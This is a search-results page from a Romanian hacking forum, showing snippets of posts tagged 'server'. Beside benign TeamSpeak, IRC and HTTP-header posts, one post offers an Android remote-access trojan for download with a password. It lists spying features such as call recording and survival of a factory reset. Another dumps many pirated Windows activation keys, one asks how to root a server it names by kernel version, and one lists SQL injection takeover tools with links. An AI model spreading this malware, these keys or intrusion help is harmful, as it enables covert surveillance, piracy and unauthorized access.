Jump to content

Search the Community

Showing results for tags 'server'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. Cine imi poate da un cont de server.pro cu credite?Vreau sa imi fac un server ! Va rog !
  2. #1. Intram pe http://www.teamspeak.com/?page=downloads #2. Alegem o versiunea server. de la LINUX #3 Apasam download si acceptam termeni. #4 Dam wget in terminal cu link-ul de aici : http://dl.4players.de/ts/releases/3.0.11.2/teamspeak3-server_linux-amd64-3.0.11.2.tar.gz #5 Dezarhivam fisierul. tar xvf teamspeak3-server_linux-amd64-3.0.11.2.tar.gz #6 Intram in folder-ul dezarhivat. cd teamspeak3-server_linux-amd64 #7 Rulam comanda : ./ts3server_startscript.sh start #8 Rulam "ifconfig" pentru a afla ip-ul serverului. #9 Acum deschidem client-ul TS3 si ne conectam. #10 Acum trebuie sa scriem privilege key cel din terminal. #11 Il punem in box si dam ok. #12 Acum putem face cateva modificari la nume,canal,description. #13 Si apasam apply.
  3. Scan: Filename: 1.apk Type: File Filesize: 262850 bytes Date: 14/05/2015 - 22:40 GMT+2 MD5: bf7b83bb02c4cfb714f176d68458b9a8 SHA1: 2fae38f3901003e2e14179f15fd35c3906a654b1 Status: Infected Result: 10/35 MaJyx Scanner | Results AVG Free - OK Avast - OK AntiVir (Avira) - OK BitDefender - Android.Trojan.AndroRAT.E Clam Antivirus - OK COMODO Internet Security - OK Dr.Web - Android.Spy.178.origin eTrust-Vet - OK F-PROT Antivirus - OK F-Secure Internet Security - Android.Trojan.AndroRAT.E G Data - Android.Trojan.AndroRAT.E IKARUS Security - OK Kaspersky Antivirus - HEUR:Trojan-Spy.AndroidOS.Sandr.a McAfee - OK MS Security Essentials - OK ESET NOD32 - OK Norman - OK Norton Antivirus - OK Panda Security - OK A-Squared - Android.Trojan.AndroRAT.E ( Quick Heal Antivirus - Android.Sandr.A Solo Antivirus - OK Sophos - Andr/SandRat-B Trend Micro Internet Security - OK VBA32 Antivirus - OK Zoner AntiVirus - OK Ad-Aware - Android.Trojan.AndroRAT.E BullGuard - Gen:Variant.Kazy.609906 FortiClient - OK K7 Ultimate - OK NANO Antivirus - OK Panda CommandLine - OK SUPERAntiSpyware - OK Twister Antivirus - OK VIPRE - OK Functi: Change logs v4.0: ----------------- * APK Encryption (AES, DES, TripleDES, Blowfish). * Assign custom package name for DJ server. * Remove certain features from the server. * Remove permissions from the server. * Call conversation recording. * Live update of currently running app on main panel. * User idle time on main panel. * Adjust volume on remote device (Alarm, Music, Notification, Ringer, System, Voice). * Check latency between DJ control panel and DJ server. * Make DJ server persistent even upon factory reset (Requires Root access). * Crash Reporter implemented to track DJ server bugs. * View Draft SMS messages. * Disconnect Me Forever now disables the DJ server instantly. * File Voyager supports UTF-8 encoding to support various languages. * Fixed several bugs. Dw: https://yadi.sk/d/pyksqqyGhDkrd Pas: fuckeTheDroid
  4. Hi guys, i know the title must sound obsolete for ya, but i've seen in the past romanian managed to "hack" a previous version of this game. https://world.triviador.net the security has changed since then, i'm wondering if there's anyone that can still make an xml grabber for it. from what i know, if you search "sharedkey" or "rsapublickey" with a memory viewer through firefox for ex, you can see a huge key. i believe that rsa key is used to encrypt the key used for decrypting the xml. anyway, i have managed to write the actual decryption algorithm for decoding the xml, and maybe for decoding the key too, but i can't get the encrypted key out from the memory of any browser. i'm curious if anyone could do that. =] ~ Cheers ~
  5. Nonse

    Se poate?

    Noroc baieti, am si eu o intrebare: Se poate lua drept de 'r00t' pe acest server ? -bash-3.2$ uname -a Linux zbserver 2.6.18-164.el5 #1 SMP Tue Aug 18 15:51:48 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux -bash-3.2$ whoami login -bash-3.2$ cat /etc/issue Red Hat Enterprise Linux Server release 5.4 (Tikanga) Kernel \r on an \m
  6. Windows 8.1 Windows 8.1 Professional GCRJD-8NW9H-F2CDX-CCM8D-9D6T9 Windows 8.1 Professional N HMCNV-VVBFX-7HMBH-CTY9B-B4FXY Windows 8.1 Enterprise MHF9N-XY6XB-WVXMC-BTDCT-MKKG7 Windows 8.1 Enterprise N TT4HM-HN7YT-62K67-RGRQJ-JFFXW Windows 8 Windows 8 Professional NG4HW-VH26C-733KW-K6F98-J8CK4 Windows 8 Professional N XCVCF-2NXM9-723PB-MHCB7-2RYQQ Windows 8 Enterprise 32JNW-9KQ84-P47T8-D8GGY-CWCK7 Windows 8 Enterprise N JMNMF-RHW7P-DMY6X-RF3DR-X2BQT Windows 7 Windows 7 Professional FJ82H-XT6CR-J8D7P-XQJJ2-GPDD4 Windows 7 Professional N MRPKT-YTG23-K7D7T-X2JMM-QY7MG Windows 7 Enterprise 33PXH-7Y6KF-2VJC9-XBBR8-HVTHH Windows 7 Enterprise N YDRBP-3D83W-TY26F-D46B2-XCKRJ Windows 7 Enterprise E C29WB-22CC8-VJ326-GHFJW-H9DH4 Windows Server 2012 R2 Windows Server 2012 R2 Server Standard D2N9P-3P6X9-2R39C-7RTCD-MDVJX Windows Server 2012 R2 Datacenter W3GGN-FT8W3-Y4M27-J84CP-Q3VJ9 Windows Server 2012 R2 Essentials KNC87-3J2TX-XB4WP-VCPJV-M4FWM Windows Server 2012 Windows Server 2012 Core BN3D2-R7TKB-3YPBD-8DRP2-27GG4 Windows Server 2012 Core N 8N2M2-HWPGY-7PGT9-HGDD8-GVGGY Windows Server 2012 Core Single Language 2WN2H-YGCQR-KFX6K-CD6TF-84YXQ Windows Server 2012 Core Country Specific 4K36P-JN4VD-GDC6V-KDT89-DYFKP Windows Server 2012 Server Standard XC9B7-NBPP2-83J2H-RHMBY-92BT4 Windows Server 2012 Standard Core XC9B7-NBPP2-83J2H-RHMBY-92BT4 Windows Server 2012 Multipoint Standard HM7DN-YVMH3-46JC3-XYTG7-CYQJJ Windows Server 2012 Multipoint Premium XNH6W-2V9GX-RGJ4K-Y8X6F-QGJ2G Windows Server 2012 Datacenter 48HP8-DN98B-MYWDG-T2DCC-8W83P Windows Server 2012 Datacenter Core 48HP8-DN98B-MYWDG-T2DCC-8W83P Windows Server 2008 R2 Windows Server 2008 R2 HPC Edition FKJQ8-TMCVP-FRMR7-4WR42-3JCD7 Windows Server 2008 R2 Datacenter 74YFP-3QFB3-KQT8W-PMXWJ-7M648 Windows Server 2008 R2 Enterprise 489J6-VHDMP-X63PK-3K798-CPX3Y Windows Server 2008 R2 for Itanium-Based Systems GT63C-RJFQ3-4GMB6-BRFB9-CB83V Windows Server 2008 R2 Standard YC6KT-GKW9T-YTKYR-T4X34-R7VHC Windows Web Server 2008 R2 6TPJF-RBVHG-WBW2R-86QPH-6RTM4 MVBCQ-B3VPW-CT369-VM9TB-YFGBP MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P Windows Keys 7YWX9-W3C2V-D46GW-P722P-9CP4D MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P GRY6B-TJ49J-X73JG-38H9K-VWJHY C8XXQ-PQDD6-6KGP6-J8XT6-XGB2X 8XRH7-RTC6B-BJ42C-C2Q8Y-BRXMG PTTCH-H7J6M-4XXWH-86RT3-66P6M DLMKZ-2ILHP-7IUG9-A2QVK-A2BYX BPVVG-7KVMM-HGRZ1-SQZ4L-USRHM FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 3YHKG-DVQ27-RYRBX-JMPVM-WG38T MVBCQ-B3VPW-CT369-VM9TB-YFGBP Windows 7 Ultimate Serial Keys windows 7 ulimate - lenovo - 22TKD-F8XX6-YG69F-9M66D-PMJBM windows 7 ulimate - dell - 342DG-6YJR8-X92GV-V7DCV-P4K27 windows 7 ulimate - acer - FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 Windows 7 Professional Serial Keys windows 7 professional - dell - 32KD2-K9CTF-M3DJT-4J3WC-733WD windows 7 professional - acer - YKHFT-KW986-GK4PY-FDWYH-7TP9F windows 7 professional - hp - 74T2M-DKDBC-788W3-H689G-6P6GT windows 7 professional - samsung - GMJQF-JC7VC-76HMH-M4RKY-V4HX6 Windows 7 Home Premium Serial Keys windows 7 Home Premium - samsung - CQBVJ-9J697-PWB9R-4K7W4-2BT4J windows 7 Home Premium - packard bell - VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 windows 7 Home Premium - dell - 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 windows 7 Home Premium - asus - 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 7 Beta 64-bit Product Key 7XRCQ-RPY28-YY9P8-R6HD8-84GH3 JYDV8-H8VXG-74RPT-6BJPB-X42V4 482XP-6J9WR-4JXT3-VBPP6-FQF4M JYDV8-H8VXG-74RPT-6BJPB-X42V4 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Windows 7 Beta 32-bit Product Key 6JKV2-QPB8H-RQ893-FW7TM-PBJ73 TQ32R-WFBDM-GFHD2-QGVMH-3P9GC GG4MQ-MGK72-HVXFW-KHCRF-KW6KY 4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH QXV7B-K78W2-QGPR6-9FWH9-KGMM7 Windows 7 Anytime Upgrade key: RHPQ2-RMFJH-74XYM-BH4JX-XM76F Windows 7 Activation key: 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 8.1 serial key : ultimate edition NTTX3-RV7VB-T7X7F-WQYYY-9Y92F Windows 8 OS key : Professional edition XKY4K-2NRWR-8F6P2-448RF-CRYQH Windows 8 product key : Release preview TK8TP-9JN6P-7X7WW-RFFTV-B7QPF Windows 8 product number : Consumer preview DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 OS key : Developer’s preview 6RH4V-HNTWC-JQKG8-RFR3R-36498 Windows 8 product key : Developer’s version Y8N3-H7MMW-C76VJ-YD3XV-MBDKV 6RH4V-HNTWC-JQKG8-RFR3R-36498 4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV MBFBV-W3DP2-2MVKN-PJCQD-KKTF7 28VNV-HF42G-K2WM9-JXRJQ-2WBQW NF32V-Q9P3W-7DR7Y-JGWRW-JFCK8 Windows 8 serial key : English DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 software key : Chinese DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 serial number : German DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 unique serial number : French DNJXJ-7XBW8-2378T-X22TX-BKG7J Windows 8 product key : Japanese DNJXJ-7XBW8-2378T-X22TX-BKG7J Window 8 Serial Keys 100 % Working 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 967N4-R7KXM-CJKJB-BHGCW-CPKT7 84NRV-6CJR6-DBDXH-FYTBF-4X49V RRYGR-8JNBY-V2RJ9-TJP4P-749T7 ND8P2-BD2PB-DD8HM-2926R-CRYQH XWCHQ-CDMYC-9WN2C-BWWTV-YY2KV BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV KNTGM-BGJCJ-BPH3X-XX8V4-K4PKV F8X33-CNV3F-RH7MY-C73YT-XP73H 967N4-R7KXM-CJKJB-BHGCW-CPKT7 HNRGD-JP8FC-6F6CY-2XHYY-RCWXV 84NRV-6CJR6-DBDXH-FYTBF-4X49V BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV CDQND-9X68R-RRFYH-8G28W-82KT7 DWV49-3GN3Q-4XMT7-QR9FQ-KKT67 F2M4V-KFNB7-9VVTW-MVRBQ-BG667 F8X33-CNV3F-RH7MY-C73YT-XP73H GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H J6FW2-HQNPJ-HBB6H-K9VTY-2PKT7 KQWNF-XPMXP-HDK3M-GBV69-Y7RDH MMRNH-BMB4F-87JR9-D72RY-MY2KV N4WY8-DVW92-GM8WF-CG872-HH3G7 ND8P2-BD2PB-DD8HM-2926R-CRYQH RRYGR-8JNBY-V2RJ9-TJP4P-749T7 VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 84NRV-6CJR6-DBDXH-FYTBF-4X49V BDDNV-BQ27P-9P9JJ-BQJ96-KTJXV 967N4-R7KXM-CJKJB-BHGCW-CPKT7 KQWNF-XPMXP-HDK3M-GBV69-Y7RDH F2M4V-KFNB7-9VVTW-MVRBQ-BG667 CR8NP-K37C3-MPD6Q-MBDDY-8FDG7 39DQ2-N4FYQ-GCY6F-JX8QR-TVF9V VHNT7-CPRFX-7FRVJ-T8GVM-8FDG7 GPTCC-XN297-PVGY7-J8FQY-JK49V HV3TW-MMNBG-X99YX-XV8TJ-2GV3H CDQND-9X68R-RRFYH-8G28W-82KT7 7HBX7-N6WK2-PF9HY-QVD2M-JK49V D32KW-GNPBK-CV3TW-6TB2W-K2BQH NBWPK-K86W9-27TX3-BQ7RB-KD4DH 2NF99-CQRYR-G6PQ9-WYGJ7-8HRDH F7BDM-KTNRW-7CYQP-V98KC-W2KT7 4JKWV-MNJCY-8MW3Q-VJYGP-DC73H KQWNF-XPMXP-HDK3M-GBV69-Y7RDH MMRNH-BMB4F-87JR9-D72RY-MY2KV N4WY8-DVW92-GM8WF-CG872-HH3G7 ND8P2-BD2PB-DD8HM-2926R-CRYQH RRYGR-8JNBY-V2RJ9-TJP4P-749T7 FFX8D-N3WMV-GM6RF-9YRCJ-82KT7 2CMGK-NMW4P-B846H-YXR6P-27F9V D2GBF-NGBW4-QQRGG-W38YB-BBFDH NTVHT-YF2M4-J9FJG-BJD66-YG667 GBJJV-YNF4T-R6222-KDBXF-CRYQH 4NMMK-QJH7K-F38H2-FQJ24-2J8XV 84NRV-6CJR6-DBDXH-FYTBF-4X49V 3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH 988NM-XKXT9-7YFWH-H2Q3Q-C34DH TGXN4-BPPYC-TJYMH-3WXFK-4JMQH N9C46-MKKKR-2TTT8-FJCJP-4RDG7 Q4NBQ-3DRJD-777XK-MJHDC-749T7 2VTNH-323J4-BWP98-TX9JR-FCWXV D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV 2GVN8-TV3C2-K3YM7-MMRVM-BBFDH 4NMMK-QJH7K-F38H2-FQJ24-2J8XV 76NDP-PD4JT-6Q4JV-HCDKT-P7F9V 7HBX7-N6WK2-PF9HY-QVD2M-JK49V ================================================================================================================= Windows 8.1 PRO / ENT Phone Activation MAK Key ** Windows 8.1 PRO / ENT Mak Keys Activate Both PRO & ENTERPRISE Edition Compatible to Upgrade WMC Edition.! ** Product Key(s)---------------------------------Remaining Activation Counts slmgr.vbs -ipk 7FGTT-NXKP6-KCHBY-D3XP9-FRFX3 937 slmgr.vbs -ipk P86Q8-PNR2W-4F226-BPJ2Q-7T8K3 591 slmgr.vbs -ipk JGDNT-VKFPY-36K8K-H83V7-VT8K3 165 slmgr.vbs -ipk Q36YN-97WHT-GQ4BR-684QP-FX7QQ 95 slmgr.vbs -ipk 9R3DP-NJV9M-P2TYG-6C4KR-R3JK3 25 slmgr.vbs -ipk K8YXT-N2KDG-B39MT-THK2H-XD6VD slmgr.vbs -ipk GNCQM-TQJ9H-CD22V-DM4RX-9HHQQ slmgr.vbs -ipk NTJ92-QJFB3-YVBYK-7J9BC-GQ6VD slmgr.vbs -ipk 2N4YY-H4KRF-CXVM6-DB46Y-RCYDQ slmgr.vbs -ipk 4HFYM-N3CH8-8237K-7YDKD-8K7QQ slmgr.vbs -ipk 7TYYN-H7GKX-MMCXW-KWKDT-6F27D slmgr.vbs -ipk CWKY6-FGNX6-877Y7-DTGFM-RCYDQ slmgr.vbs -ipk MPNQW-FW9V2-89HT6-TKFXK-P36VD slmgr.vbs -ipk Q226H-HN692-BG7J8-G2PHY-88D3Q [Tested working on VM1 13 November 2014] ================================================================================= Windows 8/8.1 RTM Pro WMC Phone Activation RETAIL Keys: slmgr.vbs -ipk CYGD4-6JKKC-WNGPV-X8B9P-D668D slmgr.vbs -ipk F2H27-X7VJN-YMMKJ-GPW9D-YBFFQ slmgr.vbs -ipk C9VKD-M6HPN-Y4GP4-VXG4G-XP74Q ================================================================================= Windows 8.1 RTM Pro Phone Activation RETAIL Keys slmgr.vbs -ipk NGCYH-JF34J-GD93B-RYD9T-BPYCY slmgr.vbs -ipk JNXYY-KXCW2-TVFHV-BQ63F-DJXT7 slmgr.vbs -ipk NXGRM-3VPXH-76DVR-HT43H-MBFDH slmgr.vbs -ipk RJHTD-N7283-XKYHD-77Q2V-T273H slmgr.vbs -ipk JJQNJ-DXQH2-3Y74Y-V273B-K73G7 7YWX9-W3C2V-D46GW-P722P-9CP4D MM7DF-G8XWM-J2VRG-4M3C4-GR27X KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8 MVBCQ-B3VPW-CT369-VM9TB-YFGBP KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR RGQ3V-MCMTC-6HP8R-98CDK-VP3FM Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3 6JQ32-Y9CGY-3Y986-HDQKT-BPFPG P72QK-2Y3B8-YDHDV-29DQB-QKWWM 6F4BB-YCB3T-WK763-3P6YJ-BVH24 9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC C43GM-DWWV8-V6MGY-G834Y-Y8QH3 GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9 MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7 MVYTY-QP8R7-6G6WG-87MGT-CRH2P GRY6B-TJ49J-X73JG-38H9K-VWJHY C8XXQ-PQDD6-6KGP6-J8XT6-XGB2X 8XRH7-RTC6B-BJ42C-C2Q8Y-BRXMG PTTCH-H7J6M-4XXWH-86RT3-66P6M DLMKZ-2ILHP-7IUG9-A2QVK-A2BYX BPVVG-7KVMM-HGRZ1-SQZ4L-USRHM FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 3YHKG-DVQ27-RYRBX-JMPVM-WG38T MVBCQ-B3VPW-CT369-VM9TB-YFGBP Windows 7 Ultimate Serial Keys windows 7 ulimate - lenovo - 22TKD-F8XX6-YG69F-9M66D-PMJBM windows 7 ulimate - dell - 342DG-6YJR8-X92GV-V7DCV-P4K27 windows 7 ulimate - acer - FJGCP-4DFJD-GJY49-VJBQ7-HYRR2 Windows 7 Professional Serial Keys windows 7 professional - dell - 32KD2-K9CTF-M3DJT-4J3WC-733WD windows 7 professional - acer - YKHFT-KW986-GK4PY-FDWYH-7TP9F windows 7 professional - hp - 74T2M-DKDBC-788W3-H689G-6P6GT windows 7 professional - samsung - GMJQF-JC7VC-76HMH-M4RKY-V4HX6 Windows 7 Home Premium Serial Keys windows 7 Home Premium - samsung - CQBVJ-9J697-PWB9R-4K7W4-2BT4J windows 7 Home Premium - packard bell - VQB3X-Q3KP8-WJ2H8-R6B6D-7QJB7 windows 7 Home Premium - dell - 6RBBT-F8VPQ-QCPVQ-KHRB8-RMV82 windows 7 Home Premium - asus - 7JQWQ-K6KWQ-BJD6C-K3YVH-DVQJG Windows 7 Beta 64-bit Product Key 7XRCQ-RPY28-YY9P8-R6HD8-84GH3 JYDV8-H8VXG-74RPT-6BJPB-X42V4 482XP-6J9WR-4JXT3-VBPP6-FQF4M JYDV8-H8VXG-74RPT-6BJPB-X42V4 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Windows 7 Beta 32-bit Product Key 6JKV2-QPB8H-RQ893-FW7TM-PBJ73 TQ32R-WFBDM-GFHD2-QGVMH-3P9GC GG4MQ-MGK72-HVXFW-KHCRF-KW6KY 4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH Windows 7 Ultimate Retail Offline Activation Key HTXFV-FH8YX-VCY69-JJGBK-7R6XP 72VG4-V3KTK-7BQYH-7GXDW-48JJ3 GCHHP-39HXK-X3YWW-HPBWQ-RPGQV GMY2P-RBX7P-TQGX8-C8B9B-BGXFF J78FT-J48BQ-HH2M7-CYVTM-MXRHY 6QVYR-WQDGH-RPV2H-FH739-M462C 6MGBH-4QDD8-7V9G8-WJ4KR-9JPFK BPFDC-JQMCP-7CRPX-DCT9D-CXQB9 FBQFV-6VW7F-C8MXX-VTMV3-R7KKQ MQ9VV-GPKFB-4R88W-H3KBT-CXMYH TM7K4-MMRYX-6BMFT-38D72-K3J8W Windows 8 Professional NG4HW-VH26C-733KW-K6F98-J8CK4 XKY4K-2NRWR-8F6P2-448RF-CRYQH Windows 8 Professional N XCVCF-2NXM9-723PB-MHCB7-2RYQQ windows 7 keys are: H3RCX-HC6QD-DB492-YWGHP-3PB4C PVBHT-4796G-KM9Q3-7V8HD-J6V7M FGXGR-D4GTB-6YY24-HG67D-FPQJV PMMB7-VPWQM-R4TBJ-RQW4F-4J6JB H2CF9-HX9MM-KY3XQ-26W9C-BYYYX MKCRW-7BVW9-QT44X-QK7J3-RTJ79 6D72M-BGMX8-R8C6H-PFD72-Q3W6F VVCFH-4P4X2-KMFG2-PBPK3-G9X93 W3DDG-QM7B8-4J499-J8Q22-R3QW6 Q7WQW-QJBW8-C72H6-M8TX9-P4TB6 W2RQF-RRR9B-3BF7T-K2WYB-M7M8Q XJBCD-6QCVR-RFBWX-939GC-KHC9J 4DMCV-P3RYB-YRTVW-RW4Q6-BVM9P 2VY3F-F8WVR-7D3VV-YYF37-QVQKV Enjoy!
  7. salut baieti. Vin cu propunerea pt infiintarea unui IRC server pt chat. bineinteles adminii raman la statutul oficial pe server. Sunt sigur ca exista multi pe aici care detin valuta si sute de optiuni pt gazduirea unui server de acest gen. Hai totusi sa nu uitam vremurile bune, noi astia mai in varsta..... cand era /msg x@undernet.org login xxx xxx ))) bine... puteti baga optiunea directa si din web cum are apropo.ro ...sau um avea.. habar nu mai am ce e pe acolo. P.S. o retea de socializare pt amatorii de informatica nu prea ar strica nici ea si banuiesc ca ar fi prima in domeniu. P.P.S.: noi, romanii suntem cei mai inovativi. hai sa profitam.
  8. BSQL Hacker BSQL hacker is a nice SQL injection tool that helps you perform a SQL injection attack against web applications. This tool is for those who want an automatic SQL injection tool. It is especially made for Blind SQL injection. This tool is fast and performs a multi-threaded attack for better and faster results. It supports 4 different kinds of SQL injection attacks: Blind SQL Injection Time Based Blind SQL Injection Deep Blind (based on advanced time delays) SQL Injection Error Based SQL Injection This tool works in automatic mode and can extract most of the information from the database. It comes in both GUI and console support. You can try any of the given UI modes. From GUI mode, you can also save or load saved attack data. It supports multiple injection points including query string, HTTP headers, POST, and cookies. It supports a proxy to perform the attack. It can also use the default authentication details to login into web accounts and perform the attack from the given account. It supports SSL protected URLs, and can also be used on SSL URLs with invalid certificates. BSQL Hacker SQL injection tool supports MSSQL, ORACLE and MySQL. But MySQL support is experimental and is not as effective on this database server as it is for other two. Download BSQL Hacker here: Download SQLmap SQLMap is the open source SQL injection tool and most popular among all SQL injection tools available. This tool makes it easy to exploit the SQL injection vulnerability of a web application and take over the database server. It comes with a powerful detection engine which can easily detect most of the SQL injection related vulnerabilities. It supports a wide range of database servers, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. Most of the popular database servers are already included. It also supports various kind of SQL injection attacks, including boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. One good feature of the tool is that it comes with a built-in password hash recognition system. It helps in identifying the password hash and then cracking the password by performing a dictionary attack. This tool allows you to download or upload any file from the database server when the db server is MySQL, PostgreSQL or Microsoft SQL Server. And only for these three database servers, it also allows you to execute arbitrary commands and retrieve their standard output on the database server. After connecting to a database server, this tool also lets you search for specific database name, specific tables or for specific columns in the whole database server. This is a very useful feature when you want to search for a specific column but the database server is huge and contains too many databases and tables. Download SQL Map from the link given below: https://github.com/sqlmapproject/sqlmap SQLninja SQLninja is a SQL injection tool that exploits web applications that use a SQL server as a database server. This tool may not find the injection place at first. But if it is discovered, it can easily automate the exploitation process and extract the information from the database server. This tool can add remote shots in the registry of the database server OS to disable data execution prevention. The overall aim of the tool is to allow the attacker to gain remote access to a SQL database server. It can also be integrated with Metasploit to get GUI access to the remote database. It also supports direct and reverse bindshell, both TCP and UDP. This tool is not available for Windows platforms. It is only available for Linux, FreeBSD, Mac OS X and iOS operating systems. Download SQLninja from the link given below: http://sqlninja.sourceforge.net/ Safe3 SQL Injector Safe3 SQL injector is another powerful but easy to use SQL injection tool. Like other SQL injection tools, it also makes the SQL injection process automatic and helps attackers in gaining the access to a remote SQL server by exploiting the SQL injection vulnerability. It has a powerful AI system which easily recognizes the database server, injection type and best way to exploit the vulnerability. It supports both HTTP and HTTPS websites. You can perform SQL injection via GET, POST or cookies. It also supports authentication (Basic, Digest, NTLM HTTP authentications) to perform a SQL injection attack. The tool supports wide range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. For MYSQL and MS SQL, it also supports read, list or write any file from the database server. It also lets attackers execute arbitrary commands and retrieve their output on a database server in Oracle and Microsoft SQL server. It also support web path guess, MD5 crack, domain query and full SQL injection scan. Download Safe3 SQL injector tool from the link given below: http://sourceforge.net/projects/safe3si/ SQLSus SQLSus is another open source SQL injection tool and is basically a MySQL injection and takeover tool. This tool is written in Perl and you can extend the functions by adding your own codes. This tool offers a command interface which lets you inject your own SQL queries and perform SQL injection attacks. This tool claims to be fast and efficient. It claims to use a powerful blind injection attack algorithm to maximize the data gathered. For better results, it also uses stacked subqueries. To make the process even faster, it has multi-threading to perform attacks in multiple threads. Like other available SQL injection tools, it also supports HTTPS. It can perform attacks via both GET and POST. It also supports, cookies, socks proxy, HTTP authentication, and binary data retrieving. If the access to information_schema is not possible or table does not exist, it can perform a bruteforce attack to guess the name of the table. With this tool, you can also clone a database, table, or column into a local SQLite database, and continue over different sessions. If you want to use a SQL injection tool against a MySQL attack, you will prefer this tool because it is specialized for this specific database server. Download SQLsus from the link given below: http://sqlsus.sourceforge.net/ Mole Mole or (The Mole) is an automatic SQL injection tool available for free. This is an open source project hosted on Sourceforge. You only need to find the vulnerable URL and then pass it in the tool. This tool can detect the vulnerability from the given URL by using Union based or Boolean based query techniques. This tool offers a command line interface, but the interface is easy to use. It also offers auto-completion on both commands and command arguments. So, you can easily use this tool. Mole supports MySQL, MsSQL and Postgres database servers. So, you can only perform SQL injection attacks against these databases. This tool was written in Python and requires only Python3 and Python3-lxml. This tool also supports GET, POST and cookie based attacks. But you need to learn commands to operate this tool. Commands are not typical but you need to have them. List those commands or learn, it is your personal choice. Download Mole SQL injection tool from the link below: http://sourceforge.net/projects/themole/files/ Source
  9. In this world of the web, we have seen various common attacks like XSS, Clickjacking, Session Hijacking, etc. Various HTTP headers are introduced to defend against these attacks in a simple and easy fashion. In this series of articles, we will see various headers available to protect against common web attacks and we will also see a practical approach of how to implement them in a simple PHP based application. The focus of this series is to give developers a practical touch of how these common attacks can be prevented just by using some HTTP headers. We will setup a vulnerable application to understand these headers in detail. Setting up the lab: You can download the code snippets and database file used in this application here: You can set up this PHP-MYSQL application in XAMPP or WAMP or LAMP or MAMP, depending upon your machine. In my case, I am using a Mac machine and thus using MAMP, and I kept all the files in 